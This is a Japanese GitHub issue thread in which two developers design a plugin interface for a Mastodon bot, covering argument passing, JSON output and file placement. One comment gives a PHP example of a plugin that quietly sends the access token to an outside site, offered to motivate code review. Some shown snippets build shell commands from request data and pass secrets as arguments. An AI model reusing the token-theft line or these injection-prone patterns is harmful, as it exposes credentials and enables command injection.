### ISSUE TITLE
BOT のプラグイン仕様

### ISSUE THREAD

**Issue by KEINOS** [Qithub-BOT/scripts#16]
## 提案・相談

BOT の共同開発（コラボ）に関して

本体は PHP で開発を始めたのは良いものの、やはりPythonなど**他のプログラム言語でもコラボできたらいいな**と思うので、**本体をシンプルに動かし、機能はプラグインで拡張**していく方向が良いと思うのですが、その仕様を決めて行きたいです。

## 自分の案

取り急ぎ、 issue #10 の"Hello world!"はプラグイン的な動かし方で試してみました。

PR #15 であげている README.md に仕様をまとめ始めていますが、基本的に以下のように動作しています。

1. メインスクリプト（index.php）から外部コマンド（execやsystemなど）でプラグインのスクリプトを実行する
2. メインスクリプトとプラグインはデータのやりとりをせず、メインスクリプトが一方的にプラグインのバックグラウンド実行の命令を行い終了する
3.  デバッグモード時のみフォアグラウンドで動かしプラグインの実行結果を表示する

これにより、**アクセストークンさえわかれば単体で動作するプラグインを作る**ことで言語を問わず動かすことができるからです。（これをプラグインと言うのか微妙ですが）

### プラグインに渡すデータ

下記のデータを**URLエンコードしたJSONデータ**で標準入力の第１引数として渡しています。

- Mastodon/Qiitaのアクセスに必要なアクセストークンなどのキー
- 本体スクリプト（BOT）が受け取ったGET/POSTデータ

#### データの作成イメージ
```index.php
$keys_api_json = file_get_contents('/path/to/api/key_file/qithub.conf.json');
$keys_api      = json_decode( $keys_api_json );

$array['get']  = $_GET;
$array['post'] = $_POST;
$array['keys'] = $keys_api['qiitadon_keinos_dev'];
//$array['keys'] = $keys_api['qiitadon_qithub'];

$json = json_encode($array);
$json = urlencode($json);

// 引数１のデータ
$arg1 = $json;
```

### プラグインの実行イメージ

```index.php
# Run sample.py plugin
$run_background = ' > /dev/null &';
$command = 'python ./path/to/plugin/sample.py ' . $arg1 . $run_background;
system( $command );
```

----------------

- [x] 過去の Issues も検索しましたが該当するものはありませんでした。

----------------

### 範囲
- プラグインは「トゥートの内容のみ」を生成し出力する機能に限定（トゥートの実行はしない）
- トゥートの実行は'system'ディレクトリ内のスクリプトが担当

### 入力（データの受け取り）
- プラグインは、本体スクリプトより標準入力から**URLエンコードされたJSONの配列データを受け取る**
- プラグインが受け取る配列内容（データ）は、以下の２カ所に明記・定義すること
    - プラグインの"main"スクリプト内のコメント
    - プラグインの"main"と同階層の"README.md"内

### 出力（プラグインの処理結果）
- プラグインの出力結果はJSON形式
- 本体スクリプトが**出力結果を処理するのに必要なデータを含める**
```sample.json
{
    "range":"public",
    "text":"@hidao :sob:",
    "cw_title":"閲覧注意",
    "cw_content":":pile_of_poo:",
    "nfsw": false
}
```

**Comment by hidao80** [comment]
👍 

READMI.md と合わせて読みました。大筋では非常に良い！ と思うのですが、気になることがいくつか。

1. JSON に埋まっているため、プラグイン側でトゥートに混ぜることができるので**実質アクセストークンの公開になる**と思うのですが、運用的に悪用されないでしょうか。対策がすぐに思いつかないので、要検討。
1. README.md に
>2. プラグインは自身のプラグイン・ディレクトリ以外にファイルを作成してはいけません。
>3. データファイルなど、プラグインが自動作成するファイルがある場合は、自身のプラグイン・ディレクトリ直下に".gitignore"で対象外にしてください。

とあるのですが、この 2 項から二つの意味を読み取りました。

- A. `scrpts/_scripts/issuexx/`と、プラグイン本体ファイル`scrpts/_scripts/issuexx/plugin.any`以外の一切のファイルの設置の禁止。\
    プラグインによる一時ファイルのみ`scrpts/_scripts/issuexx/`内に生成してよい。
- B. `scrpts/_scripts/issuexx/`内ならファイル・フォルダを自由に作って設置してOK。テンポラリファイルは設置せずプラグインから生成するようにし、`.gitignore`に記述してリポジトリに入れないこと。

どちらを意図しているのでしょうか？

**Comment by KEINOS** [comment]
## 1. プラグインに Access_token を渡すことについて

> 実質アクセストークンの公開になると思うのですが、運用的に悪用されないでしょうか

確かにプラグインのコードレビューをしないと知らぬ間に抜かれる事はイオンパワーでアリエール。

例えばプラグイン側で翻訳など、一見外部サービスを利用している風に見せかけてトークンを盗むとか。
```sample.php
$toot_msg_ja = file_get_contents( "https://mysecretsite.com/?toot=${toot_msg_en}&trans=enja&token=${access_token}" );
$result = toot_reply( $id_toot, 'unlisted', "翻訳しもした\n ${toot_msg_ja}", $access_token );
echo $result;
```
プログラムチームが全員そのプラグインの言語マスターだといいのですが、難しいし、かといって本体スクリプト側で諸条件にあわせてトゥート・返信・公開・未収載をコントロールすると煩雑になるし、何よりプラグインの自由度も減るし。悩むところですね。

### access_tokenの提案

スコープ（ read, write, follow ）の組み合わせごとにアクセストークンを用意しておいて、**issue を立てた時に必要なトークンレベルを宣言する**のはどうでしょう。

アクセス度が高い（ read, write, follow の全部盛り）トークンの場合は、必ずレビューする（要注意プラグイン扱い）など。

## 2. README.md に記載された設置範囲について

**「B」** の「_`scripts/_scripts/issueXX/`内ならファイル・フォルダを自由に作って設置してOK。テンポラリファイルは（略）`.gitignore`に記述してリポジトリに入れないこと_」です。

これは明記する必要がありますね。後でプッシュアップしてからコミットして筋肉モリモリします。

あと、**`scripts/_scripts/issueXX/`ディレクトリより外（上位階層へ）のファイルアクセスを禁止する**ことも入れないといけないですね。

**Comment by hidao80** [comment]
1 のソリューションとしては、提案していただいた方法も含め、
>A. コードレビューで防ぐ\
>B. API を作る
が硬いと思います。

A.は都度レビューが必要で、自己申告もアテにできない可能性をはらんでいます。

B. は一度作れば硬いですが、変更に弱く、API もろともプラグイン群を葬ってしまう可能性があります。

B. を推しますが、設計は要相談です…

**Comment by KEINOS** [comment]
ポイントは良くも悪くも「プラグインはアクセス・トークンさえあれば、ぶっちゃけ単体でも動作する」というところですよね。

かといってプラグインから逆アクセスしての本体スクリプトのAPI実装はバージョンアップに弱いし、何より仕様決めに時間がかかりそう。（早く Qithub を公言したい！）

## 提案
例えば「プラグインはあくまでもトゥート内容をジェネレートするもの」と制限してみてはどうでしょう？

先の「ただのHello world!」プラグイン #10 は、本当に標準出力に「Hello world!」と返すだけのものになるわけですが、プラグイン内部は（トゥートなどの）他の実装はしないぶんシンプルに作れるし、レビューもしやすくなると思います。

となると、トゥート内容のロジック・プラグインとは別に「トゥートをする」といった「DLL的なもの」が必要になります。

そこで、まずは「Hello World!」プラグインを「コンテンツ（トゥート内容作成）」と「アクション（トゥート実行）」に分け、コンテンツ・プラグイン自体を KISS（ Qithub-BOT/items#27 ） してみてから「アクション」部分を考えれば、先に進める気がするのですが、いかがでしょう？

**Comment by hidao80** [comment]
👍🙆

**Comment by KEINOS** [comment]
TL;DR を追加しました。

**Comment by KEINOS** [comment]
## プラグインのI/Oに関する相談

プラグインが標準入力から受け取るJSONデータですが、「受け取る内容」ではなく「受け取る方法」の相談があります。

現在は「URLエンコードされたJSONデータを第一引数に渡す」方向ですが、**URLエンコードせずに渡すのと、どちらが使いやすいでしょう？**

```sample.php
/* 本体スクリプト側のプラグイン呼び出し例 */

// プラグインに渡すデータ
$json = <<<EOL
{
  "key1": "value1",
  "key2": 2,
  "key3": {
    "key3_1": "value3_1",
    "key3_2": "value3_2"
  }
}
EOL;

// プラグインのパス
$path_plugin = "./path/to/plugins/sample/main.php";

// URLエンコード しない で渡す
$query   = "/usr/bin/php ${path_plugin} \$(printf '%s' \$(echo '${json}') )";
$result1 = `$query`; // プラグイン実行

// URLエンコード して 渡す
$json_enc = urlencode($json);
$query    = "/usr/bin/php ${path_plugin} ${json_enc}";
$result2  = `$query`; // プラグイン実行
```
### プラグイン側の受け取り値
#### URLエンコード**なし**
`{"key1":"value1","key2":2,"key3":{"key3_1":"value3_1","key3_2":"value3_2"}}`
- メリット：シンプルに受け取れる
- デメリット：文字化ける可能性がある

#### URLエンコード**あり**
`%7B%0A++%22key1%22%3A+%22value1%22%2C%0A++%22key2%22%3A+2%2C%0A++%22key3%22%3A+%7B%0A++++%22key3_1%22%3A+%22value3_1%22%2C%0A++++%22key3_2%22%3A+%22value3_2%22%0A++%7D%0A%7D`
- メリット：文字化けに強い
- デメリット：データ量が増える。プラグイン側でのデコードが必要

## 自分の案

バッドプラクティスかわからないのですが、経験上、データの送受は「UTF-8+URLエンコード」が一番安定していると感じているので、後者の「URLエンコード済みデータを渡す」に1票です。

もっと堅牢な方法や、JSONじゃなくserializeなど対案募集してます。

**Comment by hidao80** [comment]
👍

「URLエンコード済みデータを渡す」にもう一票です。

文字化けや妙なエスケープの心配をする必要がなく、大概の言語でエンコード/デコードするライブラリが確認できたので、特に問題はないと思います。（php、ruby、python、perl は確認済み。golang はなんとかしそう。）😄

**Comment by hidao80** [comment]
JSON が最も可搬性が高いと思うので JSON を推しますが、「全体が要素数 1 の配列に格納されているかどうか」問題はライブラリ依存にするより、Qithub の仕様として決めたおいた方がいいと思います。

**Comment by KEINOS** [comment]
対応言語の確認ありがとうございます！

では、現在のメンバー全員一致で「URLエンコ済みデータを渡す」にしたいと思います。

> ライブラリ依存にするより、Qithub の仕様として決めたおいた方がいいと思います。

そうですね。
各プラグインが必要とする引数の個数は用途によって変わると思うので、以下の仕様でいかがでしょう。

### 確認：プラグインに渡されるデータの仕様（INPUT編）

- 本体スクリプトから渡される標準入力の引数は１つ（第１引数）
- 引数はURLエンコードされたUTF-8のJSON配列
- 配列の内容はプラグイン側で決めて良いが以下を必須とする
    - ソースコードのコメントに明記する
    - 自身のプラグイン・ディレクトリ直下のREADME.mdに明記する（要テンプレ）

## 追加相談：プラグインの標準出力の仕様（OUTPUT編）

出力もJSONにすべきでしょうか。

「トゥートの内容を出力する」という縛りがあるので、現時点では「標準出力はUTF-8であること」以外はテキストの単純出力で良い気もします。

懸念としては、返信時のトゥート先（メンション先）など、プラグイン側で保持したデータに基づいた動作が必要なケースが出てくると思うので、今後の拡張性を考えて少なくとも以下のようなJSON形式の方がいいのかなと、KISS のしどころに悩むところです。

```sample.json
{ "status": "Hello world!" }
```
※上記`status`キーはMastodonのAPIに準拠したキー名

**Comment by hidao80** [comment]
出力は JSON に**すべき**です。

プレーンテキストでは「未収載」や「DM」など、公開範囲をプラグイン側からコントロールできないためです。

（注: コントロールヘッダを付ければ制御できますが、それをプレーンとは呼びたくない。）

## 提案

次のようなJSON はどうでしょう？

```
{
    "range":"public",
    "text":"@hidao :sob:",
    "cw":"",
   "nfsw": false
}
```

**Comment by hidao80** [comment]
cw のプレビューテキスト項目も必要ですね。

**Comment by KEINOS** [comment]
なるほど、なるほど。

方向性として、以下のような基本仕様で進める感じで良いですか？

- 出力：<br>**JSON**形式

- データ内容：<br>相手（本体スクリプト）がトゥートやその他の処理など、**出力内容を処理するのに必要な情報を返す**

**Comment by hidao80** [comment]
👍

**Comment by hidao80** [comment]
TL;DR に `cw_title` 項目と `cw_content` 項目を追加し、`cw`項目を削除しました。

**Comment by hidao80** [comment]
PR #21 、 #23 見てて次の2点気がつきました。

- 空の `index.html` を置いてまわるくらいなら、エントリポイントを `index.zzz` にした方がいい？(要サーバ設定)
- `README.md` のテンプレを用意して、設置を義務付けたほうが良い？

**Comment by KEINOS** [comment]
### index.htmlの設置義務

> 空の index.html を置いてまわるくらいなら、エントリポイントを index.zzz にした方がいい？(要サーバ設定)

そうなんですよねぇ。`touch` するだけとはいえ面倒であるとは感じました。**設置は義務でなくプラグイン作成ユーザーの判断でいいかも**しれません。

ただ、**エンドポイントは `main.xxx` が良い**気がします。今後サーバーリソースの分散で paiza.IO も視野に入れると `main.xxx` が都合がいいから ＋ Webベースで動かしていない（CLIである）ことがわかりやすいからです。

セキュリティ的に、'system' と 'plugins' スクリプトにURL直リンしての動作は #17 により .htaccess でブロックする方向ですが、デプロイ先のサーバを Nginx に引っ越した（.htaccessが使えない）時のことを考えてポカよけで index.html を置いておきたかったのが一番の理由です。

また、現行サーバは（pythonは入っているものの）index.py は動かないため　'/scripts/xxxxxx/' でアクセスされるとディレクトリ構成（特にスクリプトが作成したデータディレクトリ内）が見られる可能性もあるためです。

**いずれもサーバーの設定を各々カスタムすれば回避できる問題**なのですが、OSSであるため「念のため」といった要素が強いです。

しかし、WordPress 同様、そういったサーバー設定は BOT の設置ユーザーの責任ということで割り切ってもいいかなと思っています。

### README.md の設置義務とテンプレート

`main.xxx` と `README.md` の両方に仕様を記載しないといけないため、いささか面倒です。ただ、ちゃんと README.md を書いた後は「やはり後々のドキュメントとして必要」と感じました。

`system` も `plugins` も同じ仕様（標準入力でURLエンコ済みJSON）であるため、 README.md で必要な情報は形式化できると思います。それが可能なら **README.md はテンプレ化して設置を義務** に１票です。

### 提案

仕様をじっくり考えてからの実装だと時間がかかり過ぎるので作りながらレビューして固めていくのが良いと思います。そこで、まずは `_samples/` ディレクトリに `template_plugin` としてテンプレを作って見て判断していってはどうでしょう？

- /_samples/template_plugin/index.html
- /_samples/template_plugin/main.php
- /_samples/template_plugin/main.py
- /_samples/template_plugin/README.md

**Comment by hidao80** [comment]
## index.html の設置義務

>デプロイ先のサーバを Nginx に引っ越した（.htaccessが使えない）時のことを考えてポカよけで index.html を置いておきたかったのが一番の理由です。

なるほど！ この方法が確実かつ簡単ですね！:thumbsup: サーバそのもの or サーバ設定によらず、フォルダ内の閲覧を禁止するものとしてこれ以上の方法はないと思います。

index.html をポカ避けとすることに賛成です。🙋🏻‍♂️

## README.md の設置義務とテンプレート

main.zzz と README.md に同じことを書くイメージをしていませんでした。  
私的には、

1. main.zzz のヘッダ領域（コメント）には、プラグインの要件定義 or 仕様を書く（＝プログラマ向け）
2. README.md には USAGE （取扱説明）を書く（＝ユーザ向け）

のイメージでした。

「ドキュメントを1箇所にまとめろ」、「エンドユーザは `plugins/` 以下見んだろ」どちらももっともな話なので、ならばいっそ README.md をなくす方向で検討する方が良いかもしれません。

（モノローグ：引き継ぎできるほどのドキュメントを書く気概のあるプログラマがそれほど増えるような気がしない…😭）

## 結論

1. index.html を配置に1票。
2. README.md は**任意で配置**に1票。

## 提案

「Organization 内でプラグインの数が 5 と 10 の時に、**README.md の配置が多数派かつ定型的であると判断できる場合のみ、README.md の共通部分をテンプレートに落とし込む**」のはどうでしょう？ （数字は直感ででたらめに決めています）\
README.md の切り出しはドキュメンターに丸投げにする前提にして、まずはプログラマに README.md を好き勝手書く or 書かないしてもらって必要性を洗い出しましょう。

問題の先送りかつ KISS の維持、両立ができると考えます。

**Comment by KEINOS** [comment]
プラグインの開発も模索しながらという感じなので、しばらくプラグインを作って行きながら**共通部分をテンプレートに落とし込む**のは良い考えだと思います。

では、２ファイルは以下の通りで行きましょう！

### index.html と README.md の設置について
- index.html の設置：必須（ブランク・ファイルで構わない）
- README.md の設置：任意

**Comment by hidao80** [comment]
👍😄
